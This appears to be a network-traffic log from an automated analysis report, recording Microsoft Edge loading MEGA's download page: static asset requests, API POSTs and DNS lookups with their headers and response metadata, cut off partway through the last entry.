https://eu.static.mega.co.nz/4/js/mega-16_d87992d41e36491dde8b395476e2af0e15ca589d74f4787e840d9604b6d392e9.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-16_d87992d41e36491dde8b395476e2af0e15ca589d74f4787e840d9604b6d392e9.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: application/javascript
content-length: 90906
last-modified: Thu, 19 Dec 2024 03:31:26 GMT
vary: Accept-Encoding
etag: "6763938e-1631a"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/css/mega-4_ad60d99ac801a35d188835856d97ce40fe5f50f69a9e37dbf4d28e9db1240197.css

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/css/mega-4_ad60d99ac801a35d188835856d97ce40fe5f50f69a9e37dbf4d28e9db1240197.css HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: text/css
content-length: 46982
last-modified: Thu, 19 Dec 2024 03:31:29 GMT
vary: Accept-Encoding
etag: "67639391-b786"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/images/mega/contact-avatar_18cc8179fdcf896e202df0bee3a8a381667c7ab2e8206b7b157494d10beeae12.svg

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/images/mega/contact-avatar_18cc8179fdcf896e202df0bee3a8a381667c7ab2e8206b7b157494d10beeae12.svg HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: image/svg+xml
content-length: 632
last-modified: Thu, 19 Dec 2024 03:31:25 GMT
vary: Accept-Encoding
etag: "6763938d-278"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-17_155e5bc2fea865cacce19a492317f3ae732c229f8dd31a047dea9ae7d4df9a07.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-17_155e5bc2fea865cacce19a492317f3ae732c229f8dd31a047dea9ae7d4df9a07.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: application/javascript
content-length: 91341
last-modified: Thu, 19 Dec 2024 03:31:25 GMT
vary: Accept-Encoding
etag: "6763938d-164cd"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/mega-18_f58bc7165c15ed61d22779f4b4905ae8c29472f764eddcdfa75131b4bc809b57.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/mega-18_f58bc7165c15ed61d22779f4b4905ae8c29472f764eddcdfa75131b4bc809b57.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: application/javascript
content-length: 101348
last-modified: Thu, 19 Dec 2024 03:31:26 GMT
vary: Accept-Encoding
etag: "6763938e-18be4"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/css/mega-5_746444f1707f6a414733d026528b76fc2f2d99f5e98d03848e37574ab91cd1e6.css

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/css/mega-5_746444f1707f6a414733d026528b76fc2f2d99f5e98d03848e37574ab91cd1e6.css HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: text/css
content-length: 5249
last-modified: Thu, 19 Dec 2024 03:31:29 GMT
vary: Accept-Encoding
etag: "67639391-1481"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/css/mega-8_3520945cea4fadacd5f231298f6864bce128246889b5a900dd04a789d46b564e.css

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/css/mega-8_3520945cea4fadacd5f231298f6864bce128246889b5a900dd04a789d46b564e.css HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: text/css
content-length: 9910
last-modified: Thu, 19 Dec 2024 03:31:29 GMT
vary: Accept-Encoding
etag: "67639391-26b6"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/vendor/asmcrypto_9c90f27443fbdb85519985333a8b00c3cff0e10a2753955f41890342d64362f7.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/vendor/asmcrypto_9c90f27443fbdb85519985333a8b00c3cff0e10a2753955f41890342d64362f7.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: application/javascript
content-length: 49684
last-modified: Thu, 19 Dec 2024 03:31:28 GMT
vary: Accept-Encoding
etag: "67639390-c214"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/js/vendor/scheduler-polyfill_66da9107c97037dacd222b1f39336ce288eb8216b37b7120e81d62ee5dccf82c.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/js/vendor/scheduler-polyfill_66da9107c97037dacd222b1f39336ce288eb8216b37b7120e81d62ee5dccf82c.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: application/javascript
content-length: 7946
last-modified: Thu, 19 Dec 2024 03:31:28 GMT
vary: Accept-Encoding
etag: "67639390-1f0a"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/html/download.html-postbuild_a038856348bf04158bd3baa908b7d894881308c37f62bdc249c1942ee43a1f27.html

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/html/download.html-postbuild_a038856348bf04158bd3baa908b7d894881308c37f62bdc249c1942ee43a1f27.html HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: text/html
content-length: 2428
last-modified: Thu, 19 Dec 2024 03:31:29 GMT
vary: Accept-Encoding
etag: "67639391-97c"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/html/js/download_d68ea012b36fc8925130210f60c590ff2288fb4c660b9029f75ba828d0cc0597.js

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/html/js/download_d68ea012b36fc8925130210f60c590ff2288fb4c660b9029f75ba828d0cc0597.js HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://mega.nz
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: application/javascript
content-length: 8576
last-modified: Thu, 19 Dec 2024 03:31:29 GMT
vary: Accept-Encoding
etag: "67639391-2180"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/fonts/SourceSansPro-Regular.woff2?v=f71f612f60d5bb7e

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/fonts/SourceSansPro-Regular.woff2?v=f71f612f60d5bb7e HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://mega.nz
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: font
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:38 GMT
content-type: font/woff2
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
vary: Accept-Encoding
etag: W/"67636d71-16014"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
content-encoding: gzip
GET

https://eu.static.mega.co.nz/4/imagery/sprites-fm-mono.df524ef39720a347.woff2?h=fe3fc618a

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/imagery/sprites-fm-mono.df524ef39720a347.woff2?h=fe3fc618a HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://mega.nz
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: font
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: font/woff2
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
vary: Accept-Encoding
etag: W/"67636d71-11a88"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
content-encoding: gzip
GET

https://eu.static.mega.co.nz/4/fonts/Lato-Regular.woff2?v=6343dd45044b0726

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/fonts/Lato-Regular.woff2?v=6343dd45044b0726 HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://mega.nz
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: font
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: font/woff2
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
vary: Accept-Encoding
etag: W/"67636d71-2c9b4"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
content-encoding: gzip
GET

https://eu.static.mega.co.nz/4/fonts/Lato-Semibold.woff2?v=7194963095272d0e

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/fonts/Lato-Semibold.woff2?v=7194963095272d0e HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://mega.nz
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: font
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: font/woff2
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
vary: Accept-Encoding
etag: W/"67636d71-2cf0c"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
content-encoding: gzip
DNS

5.145.216.31.in-addr.arpa

Remote address:

8.8.8.8:53

Request

5.145.216.31.in-addr.arpa

IN PTR

Response

5.145.216.31.in-addr.arpa

IN PTR

31-216-145-5ipdcluxcom
DNS

88.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.210.23.2.in-addr.arpa

IN PTR

Response

88.210.23.2.in-addr.arpa

IN PTR

a2-23-210-88deploystaticakamaitechnologiescom
DNS

68.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

68.159.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

11.127.203.66.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.127.203.66.in-addr.arpa

IN PTR

Response
DNS

g.api.mega.co.nz

msedge.exe

Remote address:

8.8.8.8:53

Request

g.api.mega.co.nz

IN A

Response

g.api.mega.co.nz

IN CNAME

lu.api.mega.co.nz

lu.api.mega.co.nz

IN A

66.203.125.14

lu.api.mega.co.nz

IN A

66.203.125.12

lu.api.mega.co.nz

IN A

66.203.125.16

lu.api.mega.co.nz

IN A

66.203.125.15

lu.api.mega.co.nz

IN A

66.203.125.11

lu.api.mega.co.nz

IN A

66.203.125.13
POST

https://g.api.mega.co.nz/cs?id=0

msedge.exe

Remote address:

66.203.125.14:443

Request

POST /cs?id=0 HTTP/1.1
Host: g.api.mega.co.nz
Connection: keep-alive
Content-Length: 13
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://mega.nz
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://mega.nz/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, X-Hashcash, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length, X-Hashcash
Access-Control-Max-Age: 86400
Cache-Control: no-store
Original-Content-Length: 147
Content-Length: 147
Connection: keep-alive
POST

https://g.api.mega.co.nz/cs?id=0&v=2

msedge.exe

Remote address:

66.203.125.14:443

Request

POST /cs?id=0&v=2 HTTP/1.1
Host: g.api.mega.co.nz
Connection: keep-alive
Content-Length: 33
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://mega.nz
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://mega.nz/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, X-Hashcash, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length, X-Hashcash
Access-Control-Max-Age: 86400
Cache-Control: no-store
Original-Content-Length: 164
Content-Length: 164
Connection: keep-alive
POST

https://g.api.mega.co.nz/cs?id=73989029&v=3&lang=en&domain=meganz&bb=3

msedge.exe

Remote address:

66.203.125.14:443

Request

POST /cs?id=73989029&v=3&lang=en&domain=meganz&bb=3 HTTP/1.1
Host: g.api.mega.co.nz
Connection: keep-alive
Content-Length: 20
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://mega.nz
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://mega.nz/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, X-Hashcash, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length, X-Hashcash
Access-Control-Max-Age: 86400
Cache-Control: no-store
Original-Content-Length: 4
Content-Length: 4
Connection: keep-alive
POST

https://g.api.mega.co.nz/cs?id=73989030&v=3&lang=en&domain=meganz&bb=3

msedge.exe

Remote address:

66.203.125.14:443

Request

POST /cs?id=73989030&v=3&lang=en&domain=meganz&bb=3 HTTP/1.1
Host: g.api.mega.co.nz
Connection: keep-alive
Content-Length: 55
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://mega.nz
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://mega.nz/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, X-Hashcash, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length, X-Hashcash
Access-Control-Max-Age: 86400
Cache-Control: no-store
Original-Content-Length: 5
Content-Length: 5
Connection: keep-alive
POST

https://g.api.mega.co.nz/cs?id=73989031&v=3&lang=en&domain=meganz&bb=3

msedge.exe

Remote address:

66.203.125.14:443

Request

POST /cs?id=73989031&v=3&lang=en&domain=meganz&bb=3 HTTP/1.1
Host: g.api.mega.co.nz
Connection: keep-alive
Content-Length: 46
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://mega.nz
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://mega.nz/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, X-Hashcash, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length, X-Hashcash
Access-Control-Max-Age: 86400
Cache-Control: no-store
Original-Content-Length: 374
Content-Length: 374
Connection: keep-alive
DNS

14.125.203.66.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.125.203.66.in-addr.arpa

IN PTR

Response

14.125.203.66.in-addr.arpa

IN PTR

bt4apimegaconz
GET

https://eu.static.mega.co.nz/4/images/sprites/fm-illustration-sprite-wide.svg?v=e397e234dc118de4

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/images/sprites/fm-illustration-sprite-wide.svg?v=e397e234dc118de4 HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: image/svg+xml
content-length: 22129
last-modified: Thu, 19 Dec 2024 03:31:25 GMT
vary: Accept-Encoding
etag: "6763938d-5671"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/images/mega/download-dialog.png?v=cf6daa0027e27782

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/images/mega/download-dialog.png?v=cf6daa0027e27782 HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: image/png
content-length: 70369
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
etag: "67636d71-112e1"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
accept-ranges: bytes
GET

https://eu.static.mega.co.nz/4/imagery/sprites-fm-mime-90-uni.decaf26625f7b9e2.svg

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/imagery/sprites-fm-mime-90-uni.decaf26625f7b9e2.svg HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: image/svg+xml
content-length: 18226
last-modified: Thu, 19 Dec 2024 03:31:23 GMT
vary: Accept-Encoding
etag: "6763938b-4732"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/imagery/mega-icons-3d-icon-bucket-3d.309b7aad111304f7.png

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/imagery/mega-icons-3d-icon-bucket-3d.309b7aad111304f7.png HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
